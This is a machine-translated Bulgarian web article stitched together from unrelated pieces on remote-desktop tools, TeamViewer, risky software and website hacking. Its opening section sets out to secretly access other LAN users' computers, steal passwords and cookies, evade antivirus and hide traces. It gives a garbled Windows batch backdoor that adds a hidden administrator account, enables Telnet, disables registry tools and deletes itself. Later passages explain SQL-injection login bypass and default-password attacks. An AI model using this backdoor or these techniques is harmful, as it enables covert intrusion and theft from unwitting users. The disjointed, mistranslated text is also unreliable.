Дистанционно управление на компютъра без знанието на потребителя. Достъп до мрежата на екрана на някой друг: свържете се дистанционно към компютър през интернет

Здравейте всички, това е първата ми статия на сайта, така че не преценявайте стриктно. В тази публикация ще опиша как можете да получите отдалечен достъп до компютъра на потребителя в локалната си мрежа чрез командния ред, заобикаляйки всички антивируси и знаейки малко за синтаксиса на командния ред на Windows. Статията е предназначена само за Windows XP, но ако желаете, можете да презаписвате кода за всяка друга операционна система от семейство Windows. Така че нека започнем. Като цяло статията е написана за потребители на входно ниво. Най-важната цел е да се получат необходимите данни (пароли, изяви, вили, достъп до пощенски кутии, ключови файлове в мрежата, бисквитки и други важни пърхот) и да останат незабелязани, без да оставят следи от проникване. Така че нека започнем, аз съм в локална мрежа с около 5000 потребители, мрежа със статика или dhcp няма значение, получавам IP адрес и съм щастлив. Мрежата има много подмрежи, маршрути от които са регистрирани на сървър. MAC адреса на компютъра е регистриран от мрежовия администратор, както в моя случай, това е условието за свързване към мрежата, така че моят Mac ще светне, ако се случи нещо. За да избегнете това, първо инсталирате виртуална машина (използвайки VmWare 5.1), инсталирате XP върху нея, сканирате портове (използва се SuperScan 3.00, можете да изтеглите) и стартирате услугата Telnet. Свързваме виртуалната машина с мрежата чрез NAT и по този начин получаваме напълно различен mac-адрес на машината, която търси мрежата. Цялата статия за виртуку, сложете напред. Отворете обикновен ноутбук и напишете партиден файл със следното съдържание:

Това е сложен процес за потребители без специални технически познания. Софтуерът се предлага в търговски версии, които добавят допълнителни функции, но с високи стойности. Нетърговската безплатна версия е добър избор за основен отдалечен достъп, но ако трябва да отпечатате дистанционно, другите програми имат по-прост процес.

Програмите не са приятелски настроени към защитната стена и изискват конкретен порт да се предава на всеки хост, от който се нуждаете. Това не е толкова елегантно, колкото достъпът до уебсайт и кликване върху компютъра, с който искате да се свържете, но тя работи.

   @ Ехото е изключено
   Потребител на Net Admin_Support lop / add\u003e nul
Net netgroup локална група Ё ¬YoEbwa в ® Ад Admin_support / add\u003e nul
   Нетни сметки / maxpwage: неограничен\u003e nul sc config TlntSvr start = auto\u003e нула
   Sc start TlntSvr\u003e nul
   Reg добавете "HKLM \\ SOFTWARE \\ Microsoft \\ WindowsNT \\ CurrentVersion \\ Winlogon \\ SpecialAccounts \\ UserList" / v Admin_support / t REG_DWORD / d 0\u003e null
   Reg добавете "HKCU \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ policies \\ System" / v DisableRegistryTools / t Reg_dword / d 1 / f\u003e d 1 / f\u003e nul del% SestemRoot% \\ system32 \\ compmgmt.msc\u003e нула
del Start_game.bat

И въпреки че няма отдалечен способ за печат, той има някои много добри характеристики. Както и в някои други програми, трябваше да отворя порта на защитната стена. Дистанционното управление на хост компютъра работи добре и реагира добре. Успях да коригирам размера на екрана, като просто плъзнах ръбовете на клиентския прозорец.

Софтуерът има и няколко приставки, вградени в системата. Техниците за поддръжка на клиенти вероятно ще се радват на приставката за изследване, която дава на отдалечения потребител подобрена визуализация на хост компютъра, както в файловия мениджър.

Тагове: вируси, хакерство, сигурност, информационна сигурност

Дискусията за това, какво съставлява Интернет семантично - Мрежата или Големия боклук - не е свързана с основните характеристики на тази среда. Става въпрос за възможността за комуникация между устройствата, отдалечени един от друг. Мрежата се споделя от активни доставчици на данни - сървъри и пасивни компютри (клиенти) на обикновени потребители. Същият компютър може да действа както като клиент, така и като сървър - много често това е така.

Колко опасен софтуер може да ви засегне

Природната поддръжка за пренасочване не се поддържа. Тези програми не са проектирани с лоши намерения, но съдържат функции, които могат да бъдат използвани за злонамерени цели. С толкова много легитимни програми, които нарушителите могат да използват за незаконни цели, може да бъде трудно да се определи кои от тях представляват риск. Например, програмите за отдалечена администрация често се използват от системните администратори и помощните бюра за диагностициране и решаване на проблеми, възникващи на компютъра на потребителя.

Пример за взаимодействие между клиента и сървъра е достъпът до уеб страници чрез интернет. Сървърният компютър получава искането от потребителя на отдалечен клиент и му дава съдържанието на следващата страница. Но ние се интересуваме от отдалечено обслужване от съвсем различен вид - възможността да се свързваме с работен плот на друг компютър, т.е. как да се свържете с друг компютър през интернет и да видите всичко, което се случва на неговия екран.

Ако обаче програмата е била инсталирана на вашия компютър от злонамерен потребител, без ваше знание този потребител ще има отдалечен достъп до компютъра. Напълно контролиращ компютъра си, нападателят може да го използва, за да направи всичко.

Как да се предпазите от опасен софтуер

Тъй като може да има основателни причини да се обоснове наличието на опасен софтуер на компютъра ви, антивирусните решения може да не са в състояние да определят дали дадена програма е изложена на риск. Откриване и премахване на потенциално опасен софтуер Има много причини, поради които подозирате, че опасната програма, открита от механизма на Kaspersky Anti-Virus, е заплаха. В тези случаи антивирусният софтуер на Kaspersky ви помага да се отървете от опасен софтуер. В случаите, когато са открити програми, които са опасни за софтуера, но задължително сте съгласни с тях, можете да решите дали те представляват риск за вашите устройства или данни. Способността да не се открива рисков софтуер. , Ако имате въпроси относно сигурността на информацията, отидете в края на отчета и използвайте секцията за коментари.

Защо може да се нуждаете от такава отдалечена връзка? Е, например, за да помогне на колега или приятел в изпълнението на всякакви неразбираеми за операцията. Много компании използват тази отдалечена връзка, за да контролират работата на собствените си служители, както и да помагат на отдалечени клиенти. С една дума, това би било връзка и ще помислим как да го използваме.

Колоната отговаря на въпросите, оставени от читателите всеки четвъртък. Хакерите наистина изглеждат невероятни, нахлуват в системи, създават сайтове и получават тайна информация. Действията им обаче често са по-леки от очакваното, поради наличието на абсурдни дупки в сигурността, които могат да се използват и от хора, които нямат много знания в областта на информатиката. И една от тайните на хакерите е избора на правилните цели. В графата Цифрова защита се дават някои примери.

Оттам е възможно да промените сайта, защото той променя всеки файл на самия компютър. Това е технология за управление на уеб сайтове. Трудно е обаче да се намерят места с този недостатък. Споделяне без неуспешна парола и удостоверяване. Това споделяне, предназначено за компютри в локална мрежа, е достъпно в Интернет, което позволява на всеки да има достъп до локални файлове на компютър. Всички споделени папки ще се показват и могат да бъдат прочетени, променени или изтрити.

Има два начина за осъществяване на такава връзка: използване на вградени инструменти в Windows или използване на програми на трети страни.

Помислете за тези методи.

Интегриран инструментариум на Windows

Стандартният метод за свързване с чужд компютър и неговия работен плот е използването на инструмент за Windows, който се нарича - "Връзка с отдалечен работен плот, За да се свържете с друг компютър, направете следното:

Въпреки това дори този, който зададе паролата, избягва атаката. За това мениджърът на сайта трябва да "инсталира" софтуер на сайта. През процеса на инсталиране е зададена парола. В много случаи тези инсталатори са забравени. За да хакне уебсайт, всички хакери се нуждаят от достъп до инсталатора, изпълнение на показаните на екрана параметри и преконфигуриране на административната парола.

Днес инсталаторите имат заключващи функции, така че те не работят повече от веднъж - защото много хора все още забравят да изтрият инсталатора след като го използват. Файлът винаги е бил на разположение на същия адрес. За да проникнете в уебсайт, просто проверете дали файлът съществува, качете го и отменете защитата, използвана за съхраняване на паролата. Вратите бяха употребени в края на годината. За да се реши проблемът, би било достатъчно да се предотврати четенето на файла.

Отидете в менюто "Старт" и се обадете на посочената по-горе услуга.

Пред нас ще се отвори прозорец от приблизително типа:

В полето "Компютър" въведете IP адреса на отдалечената система или нейното мрежово име.

Ако отдалечената система е готова да ви предостави вашия работен плот, след няколко секунди ще я видите на екрана си. От друга страна, връзката трябва да има конфигурирани права за достъп до отдалечен работен плот за вас като клиент.

Той работи по следния начин: потребителят и паролата, въведени във формуляра, трябва да бъдат претърсени в базата данни: има ли потребител "такъв" с паролата "такъв"? Програмата трябва да използва единични кавички, за да дефинира "такива" и "такива", за да разграничи аргумента на заявката.

Чрез поставянето на единични кавички във формуляра за вход, хакерът разбива логиката за търсене, а останалата част вече не е зададен, т.е. базата данни няма да търси потребител с това име, а да интерпретира това, което е част от заявката. Тук започва магията: "или" е английска дума, която означава "или", и променя логиката на "въпроса", който получава базата данни.

Изпращането на такова съдържание като изображение от компютърния екран през Интернет е доста скъп бизнес. Не винаги има нужда от високо качество на предаденото изображение. Понякога достатъчно ниска резолюция на екрана. За да конфигурирате този и други параметри на работния плот на някой друг, трябва да кликнете върху бутона "Опции" и да зададете необходимите опции.

Тъй като 1 винаги ще бъде 1, базата данни ще върне всички съществуващи потребители към системата. Тъй като софтуерът разбира, че само един потребител се регистрира, той ще използва първия резултат в базата данни, който обикновено е административен потребител.

Резултатът е пълен достъп до системата, без да е необходимо да знаете потребителя и паролата. Софтуерът, защитен от този неуспех, не позволява изпращането на единични кавички до командата за базата данни и също така потвърждава, че заявката е върната на няколко потребители - нещо, което никога не би трябвало да се случи.

Прозорецът с параметри съдържа няколко отметки и много опции, които нямаме място и възможност да обсъдим подробно. Ние ги изброяваме накратко, така че да е ясно какво е заложено. В прозореца за настройки можете да настроите и зададете такива неща:

Адреси? Тази програма може да промени страницата или дори да даде управлението на сървъра на хакери. Хакерите не трябва да знаят как да разработят тази специална програма, защото могат да бъдат намерени в интернет. Има няколко "вкуса" - просто изберете. Сайтовете, които не са податливи на тази грешка, носят имена и упълномощени адреси в кода, т.е. програмата ще разбере, че "съдържанието" има невалидна стойност и го игнорира. За да се предотврати хакването на клиентите, хостинг доставчиците често предотвратяват зареждането на интернет адреси в кода на сайта, като по този начин защитават дори уязвимите точки на атака.

Разделителна способност на екрана на десктопа и качеството на цветовете на някой друг.
Прехвърлете настройките за интернет на друг компютър, например клавишни комбинации. Настройките на някой друг заменят собствените си по време на свързването.
Програма, която се стартира, когато се осъществява достъп до работния плот на друг потребител. Това се отнася до програмата на свързания компютър.
Много други функции са изброени в раздела "Advanced", включително различни визуални ефекти.

Запознайте се с "Team Viewer" .-

От дълго време обаче този провал позволява да нахлуете в много уебсайтове и просто да поставите конкретен адрес в уеб браузъра, за да го активирате. Стандартна парола Когато настройвате сайт или система, администраторът оставя същата парола, която е зададена фабрично. Всички хакери се нуждаят от проверка на ръководството за софтуер или хардуер, проверете паролата по подразбиране и опитайте. Ако успее, инвазията приключи.

Днес много софтуерни инструменти генерират произволни пароли по време на инсталирането им. Хардуерните устройства вече могат да използват различна парола за всеки продукт въз основа на наличен сериен номер или друг идентификатор. Тези скриптове могат да имат много функции, включително изтриване, създаване или изтегляне на файлове.

Ще приемем, че сте далеч от разглежданите въпроси, че не знаете за съществуването на чудесната програма "Team Viewer". , Използването му, свързването чрез интернет към друга система е още по-лесно, отколкото използването на вградени инструменти за Windows. Програмата има богат интерфейс и е надарена с големи възможности от разработчиците. За домашна употреба тази програма е напълно безплатна. Свързването с него през интернет не е ограничено от нищо освен фантазиите на създателите му. Ако се подозирате, че сте използвали програмата по търговски път, времето за свързване ще бъде ограничено директно в мрежата.

По правило кодовете, които експлоатират уязвимостите, изобщо не са добри, тъй като те работят в някои софтуерни грешки. Тъй като използва функцията на самата система, тя работи в 100% от случаите, без да има непредвидени обстоятелства.

По тази причина тази уязвимост се използва широко, особено от бразилските хакери, и все още може да се види в някои набори от уеб-атаки, дори и да е остаряла. Тъй като това е един от "най-чистите" недостатъци, няма смисъл да не се използва, ако компютърът на жертвата е уязвим.